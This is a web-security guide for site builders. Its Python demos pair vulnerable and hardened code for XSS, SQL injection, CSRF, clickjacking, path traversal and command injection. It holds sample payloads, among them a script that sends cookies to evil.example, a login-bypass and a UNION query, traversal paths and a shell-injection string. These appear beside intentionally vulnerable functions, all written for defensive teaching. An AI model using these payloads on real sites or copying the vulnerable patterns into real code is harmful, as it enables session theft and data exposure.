If you’re designing a website for yourself or a client, you’re going to need to check several boxes before launching it into the world. Some of those boxes are the fun ones–coming up with the color scheme, determining the page layout, and choosing creative graphics. But there’s one checkbox that, for many of us, is a bit of a downer: website security (cue sad trombone).
Website security isn’t the sexiest topic out there, but it’s critical knowledge for anyone serious about web design. Securing your website is like getting insurance on a house or car. It’s not exactly thrilling, but it’s well worth it to prevent a valuable asset from getting broken into or damaged.
In this article, we’ll go over the nuts and bolts of website security, including the types of threats you should know and the steps you need to take to secure a website.
Your comprehensive guide to website security
What is website security?
In simple terms, website security is the practice of protecting your website from online attacks. These attacks include unauthorized access, modification, disruption, or destruction of your site.
The people behind these attacks are known as hackers. Typically, their goal is to use your site as a vehicle to access online data like contact information, personal details and passwords, and credit card information.
From a business perspective, this not only compromises the integrity of your brand, but it also puts customers and clients at risk. Take it from the well-known trading app Robinhood–just last November, their customer support system was hacked to expose the email addresses, names, and phone numbers of 7 million users.
Types of web security threats you should know
Hackers have a lot of tools in their toolkit, so it’s helpful to have a broad understanding of the different types so that you can better protect your website. Here are some of the most common types of attacks.
Cross-site scripting (XSS): This attack exploits the trust a user’s browser places in a particular site. The attacker gets malicious script into a page the site serves, either by storing it where the site will display it later (a comment, a profile field) or by reflecting it back from a crafted link. Because the browser treats the script as the site’s own code, it can read the user’s cookies and session tokens, send requests in the user’s name, and capture anything the user types into the page.
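The following is an added example (not code from the original article) showing the two halves of a stored XSS bug in a comment page: a template that pastes user text straight into the HTML, and the same template with the text escaped. A second pair shows why the escaping must also cover double quotes when the value lands inside an attribute. The attacker inputs, the templates, and the CSP header value are all constructed for the demonstration.

```python
import html

# Constructed sample input: a comment an attacker posts to a trusted site.
ATTACKER_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
# Constructed sample input aimed at an attribute context: closes the value
# attribute early and adds an event handler.
ATTACKER_SEARCH = '" autofocus onfocus="alert(document.cookie)'

COMMENT_TEMPLATE = '<h2>Comments</h2>\n<p class="comment">{body}</p>'
SEARCH_TEMPLATE = '<input type="text" name="q" value="{value}">'


def render_comment_unsafe(body: str) -> str:
    """Vulnerable: user text is pasted into the page as markup."""
    return COMMENT_TEMPLATE.format(body=body)


def render_comment_safe(body: str) -> str:
    """Hardened: < > & " ' become entities, so the browser shows text, not code."""
    return COMMENT_TEMPLATE.format(body=html.escape(body, quote=True))


def render_search_unsafe(value: str) -> str:
    """Vulnerable: a double quote in the value terminates the attribute."""
    return SEARCH_TEMPLATE.format(value=value)


def render_search_safe(value: str) -> str:
    """Hardened: quote=True escapes " as well, so the value cannot break out."""
    return SEARCH_TEMPLATE.format(value=html.escape(value, quote=True))


def has_script_tag(rendered: str) -> bool:
    """Crude check: does the rendered page contain a script element?"""
    return "<script" in rendered.lower()


def has_injected_handler(rendered: str) -> bool:
    """Crude check: an event-handler attribute the template never had."""
    return ' onfocus="' in rendered


# Defence in depth: a CSP that forbids inline script, so a single escaping
# mistake does not by itself let attacker-controlled JavaScript run.
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'")


if __name__ == "__main__":
    for label, page in [
        ("comment, unescaped", render_comment_unsafe(ATTACKER_COMMENT)),
        ("comment, escaped  ", render_comment_safe(ATTACKER_COMMENT)),
        ("search, unescaped ", render_search_unsafe(ATTACKER_SEARCH)),
        ("search, escaped   ", render_search_safe(ATTACKER_SEARCH)),
    ]:
        danger = has_script_tag(page) or has_injected_handler(page)
        print(f"{label}: {'EXPLOITABLE' if danger else 'ok'}  {page!r}")
```

Escaping is context-specific: entity encoding is right for HTML text and attribute values, but a value dropped into a `<script>` block or a URL needs different treatment. Most template engines escape by default; the bug usually appears where someone turned that off with a "safe" or "raw" marker.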
SQL injection: The attacker supplies input that the application pastes into a database query, so the input is interpreted as SQL code rather than as data. This allows them to spoof identity (log in without a password), read and tamper with existing data, destroy the data altogether, and, depending on the database configuration, take over the database server.
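Added example (not from the original article) of a login query built by string formatting beside the same query using bound parameters, run against a constructed in-memory SQLite table. The two attacker inputs show the login bypass and a UNION-based data read the paragraph describes. Passwords are stored in plain text only to keep the demo short; a real application stores password hashes.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed users table; plaintext passwords are for the demo only."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        [("admin", "S3cret!", 1), ("alice", "hunter2", 0)],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Vulnerable: user input becomes part of the SQL text."""
    query = (
        "SELECT username, is_admin FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    """Hardened: placeholders keep the input as data, whatever it contains."""
    query = "SELECT username, is_admin FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def find_users_vulnerable(conn, username: str):
    """A profile lookup with the same flaw; UNION lets the attacker read other columns."""
    return conn.execute(
        f"SELECT username, is_admin FROM users WHERE username = '{username}'"
    ).fetchall()


def find_users_safe(conn, username: str):
    return conn.execute(
        "SELECT username, is_admin FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs. In SQLite (as in most engines) "--" comments out
# the rest of the line, including the password check.
BYPASS_USERNAME = "admin'--"
UNION_USERNAME = "x' UNION SELECT username, password FROM users--"


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable login:", login_vulnerable(conn, BYPASS_USERNAME, "wrong"))
    print("safe login:      ", login_safe(conn, BYPASS_USERNAME, "wrong"))
    print("vulnerable dump: ", find_users_vulnerable(conn, UNION_USERNAME))
    print("safe lookup:     ", find_users_safe(conn, UNION_USERNAME))
```

The fix is not escaping quotes by hand but never letting input reach the parser as SQL: bound parameters, or an ORM or query builder that uses them underneath. Identifiers (table and column names) cannot be bound, so those must come from an allowlist.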
Cross-site request forgery (CSRF): This attack tricks a logged-in user’s browser into sending a request to the site that the user never intended, such as changing their email address or password or submitting a form. A hidden form or image tag on the attacker’s page fires the request, and the browser attaches the user’s session cookie automatically, so the site cannot tell the forged request from a genuine one unless it also checks for something the attacker’s page cannot produce, such as a per-session token. The lesson? While trust is great for relationships, it shouldn’t be given out freely when it comes to websites.
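Added example (not from the original article) of a change-email handler with and without CSRF protection. Requests are represented as constructed dictionaries standing in for what the browser actually sends: the session cookie, which the browser attaches to both the genuine and the forged request, and the form fields, which only the page that built the form controls. The site origin, secret, and session id are assumptions for the demonstration.

```python
import hashlib
import hmac
import secrets

SITE_ORIGIN = "https://shop.example"         # assumed origin of the site being protected
SERVER_SECRET = secrets.token_bytes(32)      # assumed: generated at startup, never sent to clients
SESSION_ID = "sess-abc"                      # constructed session cookie value


def csrf_token_for(session_id: str) -> str:
    """Per-session token the site embeds as a hidden field in its own forms."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def make_store() -> dict:
    """Constructed user store keyed by session id."""
    return {SESSION_ID: {"email": "alice@example.com"}}


def forged_request() -> dict:
    """Browser traffic when the attacker's page auto-submits a form to the site.
    The cookie rides along automatically; the attacker cannot read the token
    (same-origin policy), so the form carries none."""
    return {
        "origin": "https://evil.example",
        "cookies": {"session": SESSION_ID},
        "form": {"email": "attacker@evil.example"},
    }


def genuine_request() -> dict:
    """Browser traffic from the site's own account page: cookie plus rendered token."""
    return {
        "origin": SITE_ORIGIN,
        "cookies": {"session": SESSION_ID},
        "form": {"email": "alice@new.example", "csrf_token": csrf_token_for(SESSION_ID)},
    }


def change_email_vulnerable(request: dict, store: dict) -> str:
    """Trusts the cookie alone, so the forged request succeeds."""
    session_id = request["cookies"].get("session")
    if session_id not in store:
        return "401 not logged in"
    store[session_id]["email"] = request["form"]["email"]
    return "200 email updated"


def change_email_safe(request: dict, store: dict) -> str:
    session_id = request["cookies"].get("session")
    if session_id not in store:
        return "401 not logged in"
    # Layer 1: browsers set Origin on cross-site POSTs and a page cannot forge it.
    origin = request.get("origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-site origin"
    # Layer 2: synchronizer token, compared in constant time.
    submitted = request["form"].get("csrf_token", "")
    expected = csrf_token_for(session_id)
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return "403 csrf token missing or wrong"
    store[session_id]["email"] = request["form"]["email"]
    return "200 email updated"


if __name__ == "__main__":
    for handler in (change_email_vulnerable, change_email_safe):
        store = make_store()
        print(handler.__name__, "forged ->", handler(forged_request(), store), store[SESSION_ID])
        store = make_store()
        print(handler.__name__, "genuine ->", handler(genuine_request(), store), store[SESSION_ID])
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a third layer, because the browser then leaves the cookie off most cross-site requests; the token check still matters for older browsers and for the cases Lax permits.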
Denial of service (DoS): This attack makes a site or service unavailable to its users, either by flooding it with more traffic than it can handle or by sending input that triggers a crash or exhausts a resource such as memory, connections, or CPU time. The result is that legitimate users, such as employees or account holders, no longer have access to the site. This typically doesn’t involve the theft of data, but it does cause customers to lose trust in a business, and recovering from it can be expensive.
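Added example (not from the original article) of the application-layer defence most sites can deploy themselves: a per-client sliding-window rate limiter, run over constructed traffic in which one address sends 500 requests in a second while another browses normally. The addresses, limits, and timings are assumptions chosen for the demonstration.

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `max_requests` per client within any `window_seconds` interval."""

    def __init__(self, max_requests: int, window_seconds: float):
        self.max_requests = max_requests
        self.window = window_seconds
        self._hits = defaultdict(deque)  # client -> timestamps of accepted requests

    def allow(self, client: str, now: float) -> bool:
        q = self._hits[client]
        while q and now - q[0] >= self.window:
            q.popleft()  # forget accepted requests that have left the window
        if len(q) >= self.max_requests:
            return False  # over budget: reject without doing the expensive work
        q.append(now)
        return True


def constructed_traffic():
    """(timestamp, client_ip) pairs: one client floods, one browses normally."""
    flood = [(i * 0.002, "10.0.0.9") for i in range(500)]            # 500 requests in 1 s
    normal = [(t, "203.0.113.5") for t in (0.5, 2.0, 4.0, 6.0, 8.0)]  # 5 requests in 8 s
    return sorted(flood + normal)


def run_simulation(max_requests: int = 100, window_seconds: float = 10.0) -> dict:
    """Return {client_ip: (served, dropped)} after replaying the constructed traffic."""
    limiter = SlidingWindowLimiter(max_requests, window_seconds)
    served = defaultdict(int)
    dropped = defaultdict(int)
    for ts, ip in constructed_traffic():
        if limiter.allow(ip, ts):
            served[ip] += 1
        else:
            dropped[ip] += 1
    return {ip: (served[ip], dropped[ip]) for ip in set(served) | set(dropped)}


if __name__ == "__main__":
    for ip, (ok, rejected) in sorted(run_simulation().items()):
        print(f"{ip:<14} served={ok:>4} dropped={rejected:>4}")
```

Two caveats a practitioner would add. A limiter keyed on source address does nothing against a distributed flood from thousands of addresses, and it costs memory per address, so the per-client state needs an expiry as well; and a volumetric flood that saturates the network link has to be absorbed upstream (CDN, scrubbing service, provider-level filtering) before it ever reaches application code like this.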
File inclusion: Many web applications build a file path from request input, for example a page= parameter that selects which template to load. If that input isn’t validated, an attacker can make the application include a file it was never meant to serve (local file inclusion) or, where remote paths are allowed, a file hosted on the attacker’s own server (remote file inclusion). Combined with a file-upload feature, this lets the attacker upload code and then have the server include and run it, giving them access to user data and a way to execute their own commands.
Clickjacking: The attacker loads the target site in an invisible frame layered over decoy content on a page they control. When a user clicks something seemingly innocuous (a “Claim prize” button, say), the click actually lands on a control in the hidden frame, such as a Submit, Confirm, or Authorize button on a site the user is already logged in to. The technique can be used to make users perform actions they never intended or to capture what they type, including login credentials.
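Added example (not from the original article) showing a constructed clickjacking page beside the response headers that stop it: a Content-Security-Policy `frame-ancestors` directive with an X-Frame-Options fallback for older browsers, plus a small checker you can run over a site’s response headers to confirm protection is present. The page, the bank URL, and the header combinations are assumptions for the demonstration.

```python
# Constructed attacker page: the victim site is framed at opacity 0 directly
# over a decoy button, so the user's click lands on the framed site.
ATTACKER_PAGE = """<button style="position:absolute;top:120px;left:80px">Claim prize</button>
<iframe src="https://bank.example/transfer?to=attacker&amount=1000"
        style="position:absolute;top:0;left:0;opacity:0;width:600px;height:400px"></iframe>"""


def frame_protection_headers(allowed_ancestors=("'none'",)) -> dict:
    """Headers a site should send on every page that is not meant to be framed.

    allowed_ancestors follows CSP source syntax: ("'none'",), ("'self'",),
    or ("'self'", "https://partner.example").
    """
    headers = {"Content-Security-Policy": "frame-ancestors " + " ".join(allowed_ancestors)}
    # Legacy fallback: DENY and SAMEORIGIN are the only values browsers honour reliably.
    headers["X-Frame-Options"] = "SAMEORIGIN" if "'self'" in allowed_ancestors else "DENY"
    return headers


def is_frame_protected(headers: dict) -> bool:
    """True if a browser will refuse to frame the response on other origins."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            # When frame-ancestors is present it overrides X-Frame-Options;
            # a wildcard source lets any origin frame the page.
            return "*" not in parts[1:]
    xfo = h.get("x-frame-options", "").strip().upper()
    # ALLOW-FROM is ignored by current browsers, so treat anything but these as unprotected.
    return xfo in ("DENY", "SAMEORIGIN")


if __name__ == "__main__":
    print(frame_protection_headers())
    print(frame_protection_headers(("'self'", "https://partner.example")))
    print("attacker page can frame an unprotected response:",
          not is_frame_protected({"Content-Type": "text/html"}))
```

Setting these headers only on the login page is a common mistake; the actions an attacker wants to hijack are on the authenticated pages, so the headers belong on every response.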
Directory traversal: Also called path traversal, this attack sends a path containing sequences such as ../ (or their URL-encoded forms) in a request that the server turns into a file path, escaping the directory the application intended to serve from. As a result, attackers read files in sensitive parts of the web server file system, such as configuration files, source code, or credentials, and in some cases write to them.
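Added example (not from the original article) covering both the file inclusion and the directory traversal entries above, since they share one root cause and one fix: a page= parameter joined onto a templates directory, beside a version that allowlists the name, appends the extension itself, and verifies the resolved path stays under that directory. The site layout is constructed in a temporary directory so nothing outside it is touched.

```python
import os
import re
import tempfile
import urllib.parse

# Template names the site actually uses are plain identifiers; anything else is rejected.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+$")


def build_demo_site() -> str:
    """Constructed layout: templates/ is meant to be served, config/ is not."""
    root = tempfile.mkdtemp(prefix="demo-site-")
    os.makedirs(os.path.join(root, "templates"))
    os.makedirs(os.path.join(root, "config"))
    with open(os.path.join(root, "templates", "home.html"), "w") as f:
        f.write("<h1>Home</h1>")
    with open(os.path.join(root, "config", "db_password.txt"), "w") as f:
        f.write("db_password=hunter2\n")
    return root


def read_template_vulnerable(root: str, page: str) -> str:
    """?page=... is decoded and joined straight onto the templates directory."""
    path = os.path.join(root, "templates", urllib.parse.unquote(page))
    with open(path) as f:
        return f.read()


def read_template_safe(root: str, page: str) -> str:
    """Allowlist the name, add the extension ourselves, then confirm containment."""
    page = urllib.parse.unquote(page)
    if not SAFE_NAME.fullmatch(page):
        raise PermissionError(f"rejected template name: {page!r}")
    base = os.path.realpath(os.path.join(root, "templates"))
    target = os.path.realpath(os.path.join(base, page + ".html"))
    # realpath also resolves symlinks, so a planted link cannot point outside.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("resolved path escapes the templates directory")
    with open(target) as f:
        return f.read()


# Constructed attacker inputs: plain and URL-encoded traversal.
TRAVERSAL = "../config/db_password.txt"
TRAVERSAL_ENCODED = "..%2Fconfig%2Fdb_password.txt"


if __name__ == "__main__":
    root = build_demo_site()
    print("vulnerable:", read_template_vulnerable(root, TRAVERSAL_ENCODED).strip())
    for name in ("home", TRAVERSAL, TRAVERSAL_ENCODED):
        try:
            print("safe:", name, "->", read_template_safe(root, name))
        except PermissionError as exc:
            print("safe:", name, "->", exc)
```

The allowlist does the real work; the `realpath` containment check is defence in depth for the day someone loosens the pattern. Remote inclusion is closed by the same allowlist, since a URL cannot match it, and by disabling remote includes in the runtime where that is a setting.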
Command injection: A malicious user supplies input that a vulnerable application passes to the host operating system’s shell, so that extra commands of the attacker’s choosing run alongside the one the application intended. Those commands execute with the privileges of the hijacked application, typically the account the web server runs as.
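Added example (not from the original article) of a command line built from user input and handed to the shell, beside the two fixes: passing the value as a single argv element with no shell involved, and, where a shell cannot be avoided, quoting it with shlex. An allowlist check for the hostname the field is supposed to hold rejects the payload before any command runs. The example uses echo so it runs harmlessly on any POSIX system; the payload and the hostname pattern are constructed for the demonstration.

```python
import re
import shlex
import subprocess

# Constructed attacker input for a form field that is meant to hold a hostname.
PAYLOAD = "hello; echo INJECTED"

# RFC 1123-style hostname labels: letters, digits, hyphens, joined by dots.
HOSTNAME = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def run_vulnerable(value: str) -> str:
    """The value is interpolated into a command line; ';' starts a second command."""
    return subprocess.run(f"echo {value}", shell=True, capture_output=True, text=True).stdout


def run_safe_argv(value: str) -> str:
    """No shell: the value is one argv element, so metacharacters are just characters."""
    return subprocess.run(["echo", value], capture_output=True, text=True).stdout


def run_safe_quoted(value: str) -> str:
    """If a shell is unavoidable, shlex.quote wraps the value so the shell treats it as one word."""
    return subprocess.run(
        f"echo {shlex.quote(value)}", shell=True, capture_output=True, text=True
    ).stdout


def is_valid_hostname(value: str) -> bool:
    """Allowlist validation: reject anything that is not a plausible hostname."""
    return len(value) <= 253 and HOSTNAME.match(value) is not None


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(PAYLOAD)))
    print("argv:      ", repr(run_safe_argv(PAYLOAD)))
    print("quoted:    ", repr(run_safe_quoted(PAYLOAD)))
    print("allowlist accepts payload:", is_valid_hostname(PAYLOAD))
    print("allowlist accepts host:   ", is_valid_hostname("web-01.example.com"))
```

Validation and the argv form complement each other: the allowlist stops the attack at the input boundary, and the argv form means that even a validation bug cannot turn a value into a second command. Prefer a library call (a DNS resolver, a socket connect) over spawning a system tool at all where one exists.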